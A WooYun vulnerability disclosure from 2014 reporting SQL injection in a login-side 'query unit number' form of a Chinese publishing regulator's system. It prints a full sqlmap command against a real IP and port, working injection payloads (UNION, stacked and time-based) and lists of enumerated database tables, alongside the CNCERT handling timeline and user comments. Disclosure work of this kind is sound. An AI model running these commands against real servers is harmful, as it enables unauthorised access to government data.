当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-053919

漏洞标题:中华人民共和国新闻出版总署某系统SQL注射

相关厂商:ppsc.gov.cn

漏洞作者: lxj616

提交时间:2014-03-18 14:40

修复时间:2014-05-02 14:41

公开时间:2014-05-02 14:41

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-03-18: 细节已通知厂商并且等待厂商处理中
2014-03-25: 厂商已经确认,细节仅向厂商公开
2014-04-04: 细节向核心白帽子及相关领域专家公开
2014-04-14: 细节向普通白帽子公开
2014-04-24: 细节向实习白帽子公开
2014-05-02: 细节向公众公开

简要描述:

中华人民共和国新闻出版总署 某系统SQL注射
SQLMAP 验证(仅获取数据表名称,不再继续深入)

详细说明:

http://www.ppsc.gov.cn/logon.aspx?ReturnUrl=%2fDefault.aspx

normal1.png


点击“查询单位号”

normal2.png


然后抓包 SQLMAP

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "124.42.45.165:8086/CorporationSelect.aspx" --data="__EVENTTARGET=&__EVENTARGUMENT=&__LASTFOCUS=&__VIEWSTATE=%2FwEPDwULLTE2NzY3NzU3NTIPZBYCAgMPZBYCAgUPDxYCHgRUZXh0BQ1UUzAwMDEwMTAwMDY4ZGRk1wv4ZkGmk3X%2BX8e3a793WZnC7yA%3D&__EVENTVALIDATION=%2FwEWDwLjrvjjBALEhISFCwK0gMnQAQLY75egDQLq78uhDQLb7%2FegDQLo78uhDQLu78OhDQLD78OhDQLp74egDQLu78uhDQLS7%2FegDQLD75egDQLR7%2BugDQLax9vVBndlKK5AFFDAfJPnzBZu8Ql%2Bb4Bo&txtName=%E4%BA%BA%E6%B0%91%E5%87%BA%E7%89%88%E7%A4%BE&ddlType=TS&btnSelect=%E6%9F%A5%E8%AF%A2" -p txtName --tables


sqlmap identified the following injection points with a total of 51 HTTP(s) requests:
---
Place: POST
Parameter: txtName
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: __EVENTTARGET=&__EVENTARGUMENT=&__LASTFOCUS=&__VIEWSTATE=/wEPDwULLTE2NzY3NzU3NTIPZBYCAgMPZBYCAgUPDxYCHgRUZXh0BQ1UUzAwMDEwMTAwMDY4ZGRk1wv4ZkGmk3X+X8e3a793WZnC7yA=&__EVENTVALIDATION=/wEWDwLjrvjjBALEhISFCwK0gMnQAQLY75egDQLq78uhDQLb7/egDQLo78uhDQLu78OhDQLD78OhDQLp74egDQLu78uhDQLS7/egDQLD75egDQLR7+ugDQLax9vVBndlKK5AFFDAfJPnzBZu8Ql+b4Bo&txtName=人民出版社' AND 1380=1380 AND 'cXJF'='cXJF&ddlType=TS&btnSelect=查询
    Type: UNION query
    Title: Generic UNION query (NULL) - 1 column
    Payload: __EVENTTARGET=&__EVENTARGUMENT=&__LASTFOCUS=&__VIEWSTATE=/wEPDwULLTE2NzY3NzU3NTIPZBYCAgMPZBYCAgUPDxYCHgRUZXh0BQ1UUzAwMDEwMTAwMDY4ZGRk1wv4ZkGmk3X+X8e3a793WZnC7yA=&__EVENTVALIDATION=/wEWDwLjrvjjBALEhISFCwK0gMnQAQLY75egDQLq78uhDQLb7/egDQLo78uhDQLu78OhDQLD78OhDQLp74egDQLu78uhDQLS7/egDQLD75egDQLR7+ugDQLax9vVBndlKK5AFFDAfJPnzBZu8Ql+b4Bo&txtName=-5158' UNION ALL SELECT CHAR(58)+CHAR(120)+CHAR(111)+CHAR(113)+CHAR(58)+CHAR(84)+CHAR(88)+CHAR(71)+CHAR(100)+CHAR(70)+CHAR(106)+CHAR(116)+CHAR(120)+CHAR(121)+CHAR(107)+CHAR(58)+CHAR(117)+CHAR(110)+CHAR(115)+CHAR(58)-- &ddlType=TS&btnSelect=查询
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: __EVENTTARGET=&__EVENTARGUMENT=&__LASTFOCUS=&__VIEWSTATE=/wEPDwULLTE2NzY3NzU3NTIPZBYCAgMPZBYCAgUPDxYCHgRUZXh0BQ1UUzAwMDEwMTAwMDY4ZGRk1wv4ZkGmk3X+X8e3a793WZnC7yA=&__EVENTVALIDATION=/wEWDwLjrvjjBALEhISFCwK0gMnQAQLY75egDQLq78uhDQLb7/egDQLo78uhDQLu78OhDQLD78OhDQLp74egDQLu78uhDQLS7/egDQLD75egDQLR7+ugDQLax9vVBndlKK5AFFDAfJPnzBZu8Ql+b4Bo&txtName=人民出版社'; WAITFOR DELAY '0:0:5';--&ddlType=TS&btnSelect=查询
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: __EVENTTARGET=&__EVENTARGUMENT=&__LASTFOCUS=&__VIEWSTATE=/wEPDwULLTE2NzY3NzU3NTIPZBYCAgMPZBYCAgUPDxYCHgRUZXh0BQ1UUzAwMDEwMTAwMDY4ZGRk1wv4ZkGmk3X+X8e3a793WZnC7yA=&__EVENTVALIDATION=/wEWDwLjrvjjBALEhISFCwK0gMnQAQLY75egDQLq78uhDQLb7/egDQLo78uhDQLu78OhDQLD78OhDQLp74egDQLu78uhDQLS7/egDQLD75egDQLR7+ugDQLax9vVBndlKK5AFFDAfJPnzBZu8Ql+b4Bo&txtName=人民出版社' WAITFOR DELAY '0:0:5'--&ddlType=TS&btnSelect=查询
---
Database: News2
[72 tables]
+---------------------------------------------------------+
| dbo.AgentAudit                                          |
| dbo.AgentFillOut                                        |
| dbo.AreaCode                                            |
| dbo.AuditGuideLine                                      |
| dbo.AuditTask                                           |
| dbo.AuditTaskCorp                                       |
| dbo.AuditTaskTargetStatus                               |
| dbo.BussinessFillOutCycle                               |
| dbo.BussinessModel                                      |
| dbo.BussinessType                                       |
| dbo.CIPType                                             |
| dbo.CWBB                                                |
| dbo.CWBBTYPE                                            |
| dbo.CWBBTYPE_BNB                                        |
| dbo.CWBB_TB_TBMX                                        |
| dbo.CW_CODE_TEMP_2012                                   |
| dbo.CorpAuditBussiness                                  |
| dbo.CorpAuditContactPerson                              |
| dbo.CorpBookPrefix                                      |
| dbo.CorpBussiness                                       |
| dbo.CorpCharacter                                       |
| dbo.CorpContactPerson                                   |
| dbo.CorpElectronPrefix                                  |
| dbo.CorpGroupType                                       |
| dbo.CorpLanguage                                        |
| dbo.CorpMagazine                                        |
| dbo.CorpManageMode                                      |
| dbo.CorpManageType                                      |
| dbo.CorpNewPropertyType                                 |
| dbo.CorpNewsPaper                                       |
| dbo.CorpPropertyValues                                  |
| dbo.CorpRegisterType                                    |
| dbo.CorpSamplingValues                                  |
| dbo.CorpSystemType                                      |
| dbo.CorpVideoPrefix                                     |
| dbo.Corporation                                         |
| dbo.CorporationAudit                                    |
| dbo.CorporationKind                                     |
| dbo.FillOutYearTask                                     |
| dbo.LanguageType                                        |
| dbo.MagazineType                                        |
| dbo.NewspaperLevel                                      |
| dbo.NewspaperType                                       |
| dbo.NewspaperYearCheckType                              |
| dbo.PubUserReg                                          |
| dbo.RPT_CWBB                                            |
| dbo.RPT_CWBB_ONE                                        |
| dbo.RPT_CWBB_ZB                                         |
| dbo.ReportModel                                         |
| dbo.RoleType                                            |
| dbo.SamplingCase                                        |
| dbo.SeachFilter                                         |
| dbo.Survey1                                             |
| dbo.Survey2                                             |
| dbo.Survey4                                             |
| dbo.SurveyBalance                                       |
| dbo.SurveyParams                                        |
| dbo.SurveyReportModel                                   |
| dbo.TAB1                                                |
| dbo.UserRegister                                        |
| dbo.UserRoleBussiness                                   |
| dbo.VIEW_CWBB_SUM                                       |
| dbo.VIEW_RPT_CWBB                                       |
| dbo.ViewBussinessFillOutCycleIn2013                     |
| dbo.ViewCorpBussiness                                   |
| dbo.bussinessbasedata                                   |
| dbo.deleteFrom                                          |
| dbo.dwid                                                |
| dbo.sysdiagrams                                         |
| dbo.view_survey1_areacode                               |
| dbo.view_survey2_areacode                               |
| dbo.yqbb                                                |
+---------------------------------------------------------+
Database: tempdb
[5 tables]
+---------------------------------------------------------+
| dbo.[#112DC535]                                         |
| dbo.[#1221E96E]                                         |
| dbo.[#13160DA7]                                         |
| dbo.[#24616091]                                         |
| dbo.[#307231BB]                                         |
+---------------------------------------------------------+
Database: master
[360 tables]
+---------------------------------------------------------+
| INFORMATION_SCHEMA.CHECK_CONSTRAINTS                    |
| INFORMATION_SCHEMA.COLUMNS                              |
| INFORMATION_SCHEMA.COLUMN_DOMAIN_USAGE                  |

漏洞证明:

normal2.png


然后抓包 SQLMAP

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "124.42.45.165:8086/CorporationSelect.aspx" --data="__EVENTTARGET=&__EVENTARGUMENT=&__LASTFOCUS=&__VIEWSTATE=%2FwEPDwULLTE2NzY3NzU3NTIPZBYCAgMPZBYCAgUPDxYCHgRUZXh0BQ1UUzAwMDEwMTAwMDY4ZGRk1wv4ZkGmk3X%2BX8e3a793WZnC7yA%3D&__EVENTVALIDATION=%2FwEWDwLjrvjjBALEhISFCwK0gMnQAQLY75egDQLq78uhDQLb7%2FegDQLo78uhDQLu78OhDQLD78OhDQLp74egDQLu78uhDQLS7%2FegDQLD75egDQLR7%2BugDQLax9vVBndlKK5AFFDAfJPnzBZu8Ql%2Bb4Bo&txtName=%E4%BA%BA%E6%B0%91%E5%87%BA%E7%89%88%E7%A4%BE&ddlType=TS&btnSelect=%E6%9F%A5%E8%AF%A2" -p txtName --tables


sqlmap identified the following injection points with a total of 51 HTTP(s) requests:
---
Place: POST
Parameter: txtName
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: __EVENTTARGET=&__EVENTARGUMENT=&__LASTFOCUS=&__VIEWSTATE=/wEPDwULLTE2NzY3NzU3NTIPZBYCAgMPZBYCAgUPDxYCHgRUZXh0BQ1UUzAwMDEwMTAwMDY4ZGRk1wv4ZkGmk3X+X8e3a793WZnC7yA=&__EVENTVALIDATION=/wEWDwLjrvjjBALEhISFCwK0gMnQAQLY75egDQLq78uhDQLb7/egDQLo78uhDQLu78OhDQLD78OhDQLp74egDQLu78uhDQLS7/egDQLD75egDQLR7+ugDQLax9vVBndlKK5AFFDAfJPnzBZu8Ql+b4Bo&txtName=人民出版社' AND 1380=1380 AND 'cXJF'='cXJF&ddlType=TS&btnSelect=查询
    Type: UNION query
    Title: Generic UNION query (NULL) - 1 column
    Payload: __EVENTTARGET=&__EVENTARGUMENT=&__LASTFOCUS=&__VIEWSTATE=/wEPDwULLTE2NzY3NzU3NTIPZBYCAgMPZBYCAgUPDxYCHgRUZXh0BQ1UUzAwMDEwMTAwMDY4ZGRk1wv4ZkGmk3X+X8e3a793WZnC7yA=&__EVENTVALIDATION=/wEWDwLjrvjjBALEhISFCwK0gMnQAQLY75egDQLq78uhDQLb7/egDQLo78uhDQLu78OhDQLD78OhDQLp74egDQLu78uhDQLS7/egDQLD75egDQLR7+ugDQLax9vVBndlKK5AFFDAfJPnzBZu8Ql+b4Bo&txtName=-5158' UNION ALL SELECT CHAR(58)+CHAR(120)+CHAR(111)+CHAR(113)+CHAR(58)+CHAR(84)+CHAR(88)+CHAR(71)+CHAR(100)+CHAR(70)+CHAR(106)+CHAR(116)+CHAR(120)+CHAR(121)+CHAR(107)+CHAR(58)+CHAR(117)+CHAR(110)+CHAR(115)+CHAR(58)-- &ddlType=TS&btnSelect=查询
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: __EVENTTARGET=&__EVENTARGUMENT=&__LASTFOCUS=&__VIEWSTATE=/wEPDwULLTE2NzY3NzU3NTIPZBYCAgMPZBYCAgUPDxYCHgRUZXh0BQ1UUzAwMDEwMTAwMDY4ZGRk1wv4ZkGmk3X+X8e3a793WZnC7yA=&__EVENTVALIDATION=/wEWDwLjrvjjBALEhISFCwK0gMnQAQLY75egDQLq78uhDQLb7/egDQLo78uhDQLu78OhDQLD78OhDQLp74egDQLu78uhDQLS7/egDQLD75egDQLR7+ugDQLax9vVBndlKK5AFFDAfJPnzBZu8Ql+b4Bo&txtName=人民出版社'; WAITFOR DELAY '0:0:5';--&ddlType=TS&btnSelect=查询
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: __EVENTTARGET=&__EVENTARGUMENT=&__LASTFOCUS=&__VIEWSTATE=/wEPDwULLTE2NzY3NzU3NTIPZBYCAgMPZBYCAgUPDxYCHgRUZXh0BQ1UUzAwMDEwMTAwMDY4ZGRk1wv4ZkGmk3X+X8e3a793WZnC7yA=&__EVENTVALIDATION=/wEWDwLjrvjjBALEhISFCwK0gMnQAQLY75egDQLq78uhDQLb7/egDQLo78uhDQLu78OhDQLD78OhDQLp74egDQLu78uhDQLS7/egDQLD75egDQLR7+ugDQLax9vVBndlKK5AFFDAfJPnzBZu8Ql+b4Bo&txtName=人民出版社' WAITFOR DELAY '0:0:5'--&ddlType=TS&btnSelect=查询
---
Database: News2
[72 tables]
+---------------------------------------------------------+
| dbo.AgentAudit                                          |
| dbo.AgentFillOut                                        |
| dbo.AreaCode                                            |
| dbo.AuditGuideLine                                      |
| dbo.AuditTask                                           |
| dbo.AuditTaskCorp                                       |
| dbo.AuditTaskTargetStatus                               |
| dbo.BussinessFillOutCycle                               |
| dbo.BussinessModel                                      |
| dbo.BussinessType                                       |
| dbo.CIPType                                             |
| dbo.CWBB                                                |
| dbo.CWBBTYPE                                            |
| dbo.CWBBTYPE_BNB                                        |
| dbo.CWBB_TB_TBMX                                        |
| dbo.CW_CODE_TEMP_2012                                   |
| dbo.CorpAuditBussiness                                  |
| dbo.CorpAuditContactPerson                              |
| dbo.CorpBookPrefix                                      |
| dbo.CorpBussiness                                       |
| dbo.CorpCharacter                                       |
| dbo.CorpContactPerson                                   |
| dbo.CorpElectronPrefix                                  |
| dbo.CorpGroupType                                       |
| dbo.CorpLanguage                                        |
| dbo.CorpMagazine                                        |
| dbo.CorpManageMode                                      |
| dbo.CorpManageType                                      |
| dbo.CorpNewPropertyType                                 |
| dbo.CorpNewsPaper                                       |
| dbo.CorpPropertyValues                                  |
| dbo.CorpRegisterType                                    |
| dbo.CorpSamplingValues                                  |
| dbo.CorpSystemType                                      |
| dbo.CorpVideoPrefix                                     |
| dbo.Corporation                                         |
| dbo.CorporationAudit                                    |
| dbo.CorporationKind                                     |
| dbo.FillOutYearTask                                     |
| dbo.LanguageType                                        |
| dbo.MagazineType                                        |
| dbo.NewspaperLevel                                      |
| dbo.NewspaperType                                       |
| dbo.NewspaperYearCheckType                              |
| dbo.PubUserReg                                          |
| dbo.RPT_CWBB                                            |
| dbo.RPT_CWBB_ONE                                        |
| dbo.RPT_CWBB_ZB                                         |
| dbo.ReportModel                                         |
| dbo.RoleType                                            |
| dbo.SamplingCase                                        |
| dbo.SeachFilter                                         |
| dbo.Survey1                                             |
| dbo.Survey2                                             |
| dbo.Survey4                                             |
| dbo.SurveyBalance                                       |
| dbo.SurveyParams                                        |
| dbo.SurveyReportModel                                   |
| dbo.TAB1                                                |
| dbo.UserRegister                                        |
| dbo.UserRoleBussiness                                   |
| dbo.VIEW_CWBB_SUM                                       |
| dbo.VIEW_RPT_CWBB                                       |
| dbo.ViewBussinessFillOutCycleIn2013                     |
| dbo.ViewCorpBussiness                                   |
| dbo.bussinessbasedata                                   |
| dbo.deleteFrom                                          |
| dbo.dwid                                                |
| dbo.sysdiagrams                                         |
| dbo.view_survey1_areacode                               |
| dbo.view_survey2_areacode                               |
| dbo.yqbb                                                |
+---------------------------------------------------------+
Database: tempdb
[5 tables]
+---------------------------------------------------------+
| dbo.[#112DC535]                                         |
| dbo.[#1221E96E]                                         |
| dbo.[#13160DA7]                                         |
| dbo.[#24616091]                                         |
| dbo.[#307231BB]                                         |
+---------------------------------------------------------+
Database: master
[360 tables]
+---------------------------------------------------------+
| INFORMATION_SCHEMA.CHECK_CONSTRAINTS                    |
| INFORMATION_SCHEMA.COLUMNS                              |
| INFORMATION_SCHEMA.COLUMN_DOMAIN_USAGE                  |

修复方案:

过滤

版权声明:转载请注明来源 lxj616@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:11

确认时间:2014-03-25 23:14

厂商回复:

CNVD确认并复现所述情况,转由CNCERT向国家上级信息安全协调机构上报,由其后续通报网站管理单位。

最新状态:

暂无

漏洞评价:

评论

  1. 2014-03-18 17:27 | char ( 路人 | Rank:13 漏洞数:3 | 中国平安,不只保险这么简单。)

    你知道的太多了。

  2. 2014-05-02 15:34 | 郭斯特 ( 普通白帽子 | Rank:181 漏洞数:69 | GhostWin)

    你知道的太多了

  3. 2014-05-02 19:13 | Anonymous.L ( 实习白帽子 | Rank:37 漏洞数:8 | 最后一位关注xxxx的人 , 孤独之人)

    小白求教:post类型的注入是怎么弄的在sqlmap上,要联合burp吗?知道的@一下我

  4. 2014-05-02 22:26 | Murk Emissary ( 实习白帽子 | Rank:74 漏洞数:14 | 低调做人 低调行事)

    @Anonymous.L python ./sqlmap.py -u http://www.xxxx.com/new.asp?id=1 --data "user=admin"

  5. 2014-05-03 00:42 | Anonymous.L ( 实习白帽子 | Rank:37 漏洞数:8 | 最后一位关注xxxx的人 , 孤独之人)

    @Murk Emissary 这个我知道,就是这给 --data "user=admin" 这个是表单的数据吗?根据表单字段判断?

  6. 2014-05-03 10:57 | Murk Emissary ( 实习白帽子 | Rank:74 漏洞数:14 | 低调做人 低调行事)

    @Anonymous.L 是表单的数据,可以用burp来抓取,一般都是用wvs来扫出来的,手动检测的话工作量太大。

  7. 2014-05-03 14:27 | Anonymous.L ( 实习白帽子 | Rank:37 漏洞数:8 | 最后一位关注xxxx的人 , 孤独之人)

    @Murk Emissary 恩恩,谢谢啦!多多交流。。。。